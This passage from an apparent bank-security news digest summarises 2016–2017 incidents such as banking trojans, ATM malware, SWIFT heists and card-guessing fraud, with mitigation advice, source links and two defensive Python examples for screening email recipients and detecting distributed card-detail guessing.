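    'hold' (for encryption or approval) if account data is going to any external address,
    otherwise 'deliver'."""
    verdicts = {rcpt: classify_recipient(rcpt) for rcpt in msg["to"]}
    if "lookalike" in verdicts.values():
        action = "block"
    elif "external" in verdicts.values() and msg.get("contains_account_data", False):
        action = "hold"
    else:
        action = "deliver"
    return {"id": msg["id"], "action": action, "recipients": verdicts}


if __name__ == "__main__":
    for message in SAMPLE_MESSAGES:
        print(screen_message(message))
```

A lookalike recipient is blocked outright rather than held, because there is no legitimate reason for the bank's staff to mail a domain that is one label or one keystroke away from its own; the hold action is for genuine external recipients, where the right answer is encryption or a second approver rather than a refusal.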

Relevant URL(s): https://nakedsecurity.sophos.com/2017/01/09/bank-leaks-60000-account-details-in-three-character-email-slip-up/


Source Code for Another Android Banking Malware Leaked

(January 22, 2017)

Source code for a piece of Android banking malware, along with instructions for its use, has been leaked online, and researchers at Dr. Web have already identified a Trojan built from it in the wild. The new Trojan, BankBot, can intercept SMS messages (defeating SMS-based two-factor codes), display phishing dialogs on top of banking apps, and steal credentials and payment card details. Users can protect themselves by keeping installation from unknown sources disabled in their phone settings and avoiding attachments and links from suspicious sources.

Relevant URL(s): http://thehackernews.com/2017/01/android-banking-malware.html


Hacks at Russian Central Bank Have Cost 2 Billion Rubles

(December 3, 2016)

During 2016, malicious actors tried to nab 5 billion rubles from Russia's central bank. The central banking authority managed to redirect some of the funds but attackers still made off with 2 billion rubles, the equivalent of $31 million. Although it's unclear who is responsible for this attack, it bears some resemblance to a string of heists that gained access to SWIFT, the Society for Worldwide Interbank Financial Telecommunication. Banks should review every aspect of their information security program, including controls around their e-banking channels.

Relevant URL(s): http://money.cnn.com/2016/12/02/technology/russia-central-bank-hack/index.html


Ransomware as a Service Fuels Explosive Growth

(December 5, 2016)

Although ransomware attacks don't get much publicity, a white paper from Osterman Research indicates that nearly 50 percent of US companies fell victim to these attacks during the past year. Another report by Trend Micro found there was an increase of 172 percent of new ransomware families in the first half of 2016. Even more alarming, malware authors have a new Ransomware as a Service (RaaS) business model, where they enlist distributors to spread the software, with some packages costing as little as $100. Protection against this threat can be difficult, but knowing what to expect, and having layered security systems and a robust ransomware response plan in place can greatly help limit exposure.

Relevant URL(s): http://www.csoonline.com/article/3146537/security/ransomware-as-a-service-fuels-explosive-growth.html


InPage Zero Day Used in Attacks Against Banks

(November 23, 2016)

Researchers at Kaspersky Lab have identified a zero-day vulnerability in the InPage publishing software, which is widely used for Urdu and other Perso-Arabic script text. Several attacks exploiting it against banks have been recorded, as well as a few against government agencies. The exploit is delivered in malicious documents attached to phishing emails, so consistent staff education and testing, together with strong email threat protection, can often prevent it.

Relevant URL(s): https://threatpost.com/inpage-zero-day-used-in-attacks-against-banks/122112/


'Alice' Malware Loots ATMs

(December 21, 2016)

A new bare-bones ATM malware family, dubbed 'Alice', has recently been discovered by Trend Micro. Alice has one simple function, empty the ATM of its cash. All a criminal would need to infect a system is access to the ATM's internals to install and interact with the malware. In this case, physical ATM security and persistent monitoring can help defend against the threat.

Relevant URL(s): http://www.darkreading.com/vulnerabilities---threats/alice-malware-loots-atms/d/d-id/1327773


'Frighteningly Easy' Hack Guesses Full Credit Card Details In 6 Seconds

(December 2, 2016)

Researchers at Newcastle University have developed an extremely easy way to guess the card number, expiration date, and security code of any Visa credit or debit card in six seconds flat. The attack, named 'Distributed Guess Attack', exploits the lack of a mechanism to detect multiple invalid payment requests made from different online merchant sites. This allows an unlimited number of cracks at predicting payment information by distributing the guesses across multiple sites. The researchers believe this may be the tactic used in stealing $3 million from Tesco Bank customers recently. To mitigate this threat, banks can implement back-end analytics to help identify fraud.
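The back-end analytics the item recommends have to aggregate at the issuer, because each merchant sees only a handful of declines per card. The following is an added example (not from the article or the researchers) of an issuer-side rule over a constructed authorization log: it flags a card when declines from several distinct merchants pile up inside a short sliding window, while a single mistyped CVV at one shop is left alone.

```python
"""Issuer-side detection of distributed card-detail guessing (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of issuer-side authorization log lines (not real data).
# Card ...0001 is probed from five merchants in seconds; ...0002 is a single
# typo; ...0003 has two declines an hour apart (normal customer behaviour).
SAMPLE_LOG = """\
2016-12-01T10:00:01Z merchant=shop-a pan=411111******0001 result=DECLINED reason=BAD_EXPIRY
2016-12-01T10:00:03Z merchant=shop-b pan=411111******0001 result=DECLINED reason=BAD_EXPIRY
2016-12-01T10:00:04Z merchant=shop-c pan=411111******0001 result=DECLINED reason=BAD_EXPIRY
2016-12-01T10:00:05Z merchant=shop-d pan=411111******0001 result=DECLINED reason=BAD_EXPIRY
2016-12-01T10:00:06Z merchant=shop-e pan=411111******0001 result=DECLINED reason=BAD_CVV
2016-12-01T10:00:07Z merchant=shop-f pan=411111******0001 result=APPROVED reason=-
2016-12-01T10:00:02Z merchant=shop-a pan=411111******0002 result=DECLINED reason=BAD_CVV
2016-12-01T10:00:09Z merchant=shop-a pan=411111******0002 result=APPROVED reason=-
2016-12-01T12:00:00Z merchant=shop-b pan=411111******0003 result=DECLINED reason=BAD_EXPIRY
2016-12-01T13:00:00Z merchant=shop-c pan=411111******0003 result=DECLINED reason=BAD_EXPIRY
"""

def parse_line(line):
    """Parse one 'ts key=value ...' log line into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec

def detect_distributed_guessing(log, window=timedelta(minutes=5),
                                max_declines=3, min_merchants=3):
    """Return {pan: (declines, distinct_merchants)} for cards whose declines,
    aggregated across ALL merchants, exceed max_declines inside one sliding
    window and come from at least min_merchants different merchants.
    A per-merchant velocity check would never fire on this pattern."""
    by_pan = defaultdict(list)
    for line in log.strip().splitlines():
        rec = parse_line(line)
        if rec["result"] == "DECLINED":
            by_pan[rec["pan"]].append((rec["ts"], rec["merchant"]))
    flagged = {}
    for pan, events in by_pan.items():
        events.sort()                      # oldest first for the sliding window
        start = 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1                 # drop events older than the window
            in_window = events[start:end + 1]
            merchants = {m for _, m in in_window}
            if len(in_window) > max_declines and len(merchants) >= min_merchants:
                flagged[pan] = (len(in_window), len(merchants))
    return flagged
```

The thresholds are illustrative; in production they would be tuned against the issuer's own decline baseline, and a hit would block further authorizations on the card before the guess sequence reaches an APPROVED result.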

Relevant URL(s): http://www.darkreading.com/vulnerabilities---threats/frighteningly-easy-hack-guesses-full-credit-card-details-in-6-seconds/d/d-id/1327632


Tesco Bank Hacked

(November 7, 2016)

Over $3 million was recently stolen from 9,000 customers of UK-based Tesco Bank. The bank did not disclose how accounts had been compromised or any other details of the attack. Tesco Bank announced that they're working with authorities and regulators to address the breach. This is one instance where having a well thought out incident response plan can help greatly.

Relevant URL(s): http://thehackernews.com/2016/11/tesco-bank-hack.html


OCC Discloses Data Breach

(October 28, 2016)

As required by the Federal Information Security Modernization Act (FISMA), the OCC notified Congress and other federal agencies of a major information security incident several weeks ago. The incident involves a former employee who downloaded over 10,000 records that contained controlled, unclassified information onto removable drives that are now missing. The OCC claims that policies and technical safeguards have been implemented to prevent such an event from occurring in the future.

Relevant URL(s): https://www.occ.gov/news-issuances/news-releases/2016/nr-occ-2016-138.html


Fake Executive Social Media Accounts Threaten Enterprises

(November 16, 2016)

Research conducted by BrandProtect revealed that 19 percent of Fortune 500 CEO Twitter profiles, and 9 percent of LinkedIn accounts reviewed were represented by numerous duplicate accounts, which raises concerns about potential security vulnerabilities. These types of fake profiles are often used in spear phishing or whaling attacks, or to push malware and ransomware into enterprises. Banks can better protect themselves as well as their customers with the use of brand protection services.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/16/fake-executive-social-media-accounts/


Android Trojan Targets Customers of 94 Banks in US, Europe

(November 2, 2016)

A malicious Android app masquerading as Flash Player is targeting online banking credentials as well as payment card details. The app is purportedly focusing on banks in the US, Australia, Germany, and France. Users should avoid installing unofficial apps on their devices and app reviews and sources should be checked before installation.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/02/trojan-flash-player-android-app/


TrickBot Banking Trojan is the Next Big Threat

(November 9, 2016)

Personal and business bank accounts are being aggressively targeted by a new banking Trojan named TrickBot. Researchers believe TrickBot may have been built by part of the team that built the nefarious banking Trojan Dyre. As they see it, this Trojan is likely to become a major threat. Third-party software and operating system patches should be kept current and users should always follow safe web browsing practices, which includes the handling of email attachments and links.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/09/trickbot-banking-trojan/


Hackers Changing Tactics, Techniques, and Procedures

(October 24, 2016)

An NTT Security report reveals the financial industry has seen a significant increase in the sophistication and type of attacks in this most recent quarter. They identify finance as the most attacked industry, with 23 percent of all attacks, and 43 percent of these were web application attacks. Comprehensive penetration testing can help banks understand where and how these attacks could take place so that appropriate security solutions can be implemented.

Relevant URL(s): https://www.helpnetsecurity.com/2016/10/24/hackers-changing-tactics/


Ransomware Raises The Bar Again

(October 10, 2016)

Ransomware is now the top attack vector targeting financial organizations according to a recent survey by SANS. 55 percent of financial firms identify ransomware as the most prevalent attack, with some loss claims between $100,000 and $500,000. Banks should have ransomware response plans in place, along with offline backups, layered security systems, and end-user awareness to limit ransomware exposure.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/ransomware-raises-the-bar-again-/d/d-id/1327138


88% of Employees Lack Awareness to Stop Privacy or Security Incidents

(October 27, 2016)

A survey was recently conducted to test employees' cybersecurity awareness. The study revealed that 88 percent lacked sufficient awareness to stop preventable incidents. Other key findings cite that 16 percent of employees exhibit behaviors that put organizations at serious security risk and 25 percent failed to recognize sample phishing emails. Banks should ensure employees receive adaptive information security awareness training at regular intervals.

Relevant URL(s): https://www.helpnetsecurity.com/2016/10/27/employees-lack-awareness/


Attackers 'Hack' ATM Security with Explosives

(October 17, 2016)

Europe has seen a surge in attacks on ATMs, many using explosives to steal cash from the safes. In the first half of this year, police in Europe cataloged 492 of these attacks. On average, explosive attacks have netted criminals $18,300 each. Although these attacks have not yet made it to the United States, banks should have strong physical security in place at all ATM locations and they should be inspected regularly for tampering.

Relevant URL(s): http://www.bankinfosecurity.com/attackers-hack-atm-security-explosives-a-9457


Russian Criminals' Bank Attacks Go Global

(October 26, 2016)

Russian criminals have tested and perfected their techniques on local banks and are now taking them global. As stated by Moscow-based Group-IB, these criminals developed their attacks for the market they know best, then later go after banks in the U.S., Canada, and other countries. They also claim that another wave of attacks, mobile banking Trojans, is building up in Russia; these have escalated 471 percent recently. U.S. based banks would be wise to stay abreast of international cyberattacks to help improve their security strategies.

Relevant URL(s): www.csoonline.com/article/3135364/security/russian-criminals-bank-attacks-go-global.html


FFIEC Rewrites the Information Security IT Examination Handbook

(September 27, 2016)

The FFIEC has recently updated their guidance for managing financial institutions' information systems, which is the first update in over 10 years. The updated handbook is almost 40% shorter; however, the expectations have increased. A more traditional approach to risk management is contained in the guidance, as well as an increased focus on cybersecurity controls, internal assessments, and third-party service providers.

Relevant URL(s): http://complianceguru.com/2016/09/ffiec-rewrites-it-handbook/


FDIC Updates IT Examination Procedures

(June 30, 2016)

FDIC-supervised institutions will be subject to new IT examination procedures starting immediately. This major overhaul, now dubbed InTREx (Information Technology Risk Examination), is the first considerable update since 2007. The new design has a simpler pre-examination phase but institutions should prepare for a more thorough examination phase. The new granular procedures require examiners to review and evaluate your documentation and determine if it sufficiently proves that you're doing what you say you'll do. Having necessary documentation available may make all the difference.

Relevant URL(s): https://www.fdic.gov/news/news/financial/2016/fil16043.html


SWIFT Sees New Hack Attacks Against Banks

(August 31, 2016)

Since the theft of $81 million from the central bank of Bangladesh's account at the Federal Reserve Bank of New York, SWIFT has seen continued attacks against banks' local security controls to send fraudulent messages via the SWIFT network. In a private letter from SWIFT to its customers, the collective warns that some banks have lost money as a result. The letter also explains that targets have varied in size and geography, and have used diverse connectivity methods; however, they've all had weaknesses in their local security. Banks are urged to install the updated SWIFT software, which includes stronger password management rules, better user authentication, and better tools for detecting attacks.

Relevant URL(s): http://www.bankinfosecurity.com/swift-sees-new-hack-attacks-against-banks-a-9374


Secret Service Warns of ‘Periscope’ Skimmers

(September 16, 2016)

According to an alert by a financial task force, a new type of skimming technology known as "periscope skimming" has been found in at least two ATMs in Connecticut and Pennsylvania. This new skimmer connects directly to the ATM's internal circuitry to steal payment card information and can store up to 32,000 card numbers. In both of these cases the criminals installed the devices by gaining access to the insides of the ATMs with a key. ATMs should be physically secured, not exposed at the top if possible, and checked regularly for evidence of tampering.

Relevant URL(s): http://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/


Banking Trojan GozNym Botnet Sinkholed After Infecting Over 23,000 Victims in UK, US and Europe

(September 29, 2016)

Researchers with Cisco Talos were able to successfully bring down a very large botnet controlled by GozNym operators. GozNym, a powerful banking Trojan, is a combination of features from two families of malware, Gozi and Nymaim. The Trojan was found to have infected at least 23,000 victims in the US, the UK, and Europe. These types of threats, which are typically delivered via spear phishing, can often be mitigated with education campaigns, consistent social engineering testing of staff, and email security filtering.

Relevant URL(s): http://www.ibtimes.co.uk/banking-trojan-goznym-botnet-sinkholed-after-infecting-over-23000-victims-uk-us-europe-1583973



Contents

  1. WannaCry Inspires Banking Trojan to Add Self-Spreading Ability
  2. White House Advisers Warn of CNI Cyber-9/11
  3. Phish Bait: DMARC Adoption Failures Leave Companies Exposed
  4. Dumping Data from Deep-Insert Skimmers
  5. Ukraine Central Bank Detects Massive Attack Preparation
  6. US Banks Targeted with Trickbot Trojan
  7. One of the Biggest Ethereum and Bitcoin Exchanges Got Hacked
  8. Swiss Users Targeted with Windows, macOS Banking Trojan
  9. Critical Flaw Found in Windows NTLM Security Protocol
  10. Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again
  11. Cyberattack Hits Ukraine Then Spreads Internationally
  12. Kaspersky: Online Banking Hacks Cost Banks Nearly $1.8M Each
  13. Most Organizations Believe Their Mainframe is More Secure Than Other Systems
  14. HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
  15. Poor Endpoint Security Can Cost You Millions in Detection, Response, and Wasted Time
  16. Massive Cyberattack Targeting 99 Countries Causes Sweeping Havoc
  17. Bank Account Hackers Used SS7 to Intercept Security Codes
  18. Google Docs Phishing Attack Abuses Legitimate Third-Party Sharing
  19. FBI: Business- and Email Account Compromise Attack Losses Hit $5 Billion
  20. Blackmoon Banking Trojan Goes Modular
  21. Banks Must Focus More on Cyber-Risk
  22. Cybercriminals Seized Control of Brazilian Bank for 5 Hours
  23. Health Savings Account Fraud: The Rapidly Growing Threat
  24. Mobile Payment Card Cloning: Understanding the Risks
  25. ATMitch: Remote Administration of ATMs
  26. Banking Agencies Issue Joint Report to Congress
  27. NY Breach Report Highlights Third-Party Risk
  28. Over One Million Fraud Attacks on Financial Firms in 2016
  29. Dridex Trojan Gets AtomBombing Update
  30. Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
  31. Banks Around the World Targeted in Watering Hole Attacks
  32. Fast Food Chain Arby’s Acknowledges Breach
  33. A Rash of Invisible, Fileless Malware is Infecting Banks Around the Globe
  34. Zeus-Derived Flokibot Malware Invades PoS
  35. Infected Weather App's Forecast: Malware
  36. ABA Endorses Anti-Phishing and Brand Protection Solution by Easy Solutions
  37. Stolen Passwords Fuel Cardless ATM Fraud
  38. Carbanak's Back And Using Google Services For Command-and-Control
  39. ATM Malware Retooled to Strike More Machines
  40. Bank Leaks 60,000 Account Details in Three Character Email Slip-up
  41. Source Code for Another Android Banking Malware Leaked
  42. Hacks at Russian Central Bank Have Cost 2 Billion Rubles
  43. Ransomware as a Service Fuels Explosive Growth
  44. InPage Zero Day Used in Attacks Against Banks
  45. 'Alice' Malware Loots ATMs
  46. 'Frighteningly Easy' Hack Guesses Full Credit Card Details In 6 Seconds
  47. Tesco Bank Hacked
  48. OCC Discloses Data Breach
  49. Fake Executive Social Media Accounts Threaten Enterprises
  50. Android Trojan Targets Customers of 94 Banks in US, Europe
  51. TrickBot Banking Trojan is the Next Big Threat
  52. Hackers Changing Tactics, Techniques, and Procedures
  53. Ransomware Raises The Bar Again
  54. 88% of Employees Lack Awareness to Stop Privacy or Security Incidents
  55. Attackers 'Hack' ATM Security with Explosives
  56. Russian Criminals' Bank Attacks Go Global
  57. FFIEC Rewrites the Information Security IT Examination Handbook
  58. FDIC Updates IT Examination Procedures
  59. SWIFT Sees New Hack Attacks Against Banks
  60. Secret Service Warns of ‘Periscope’ Skimmers
  61. Banking Trojan GozNym Botnet Sinkholed After Infecting Over 23,000 Victims in UK, US and Europe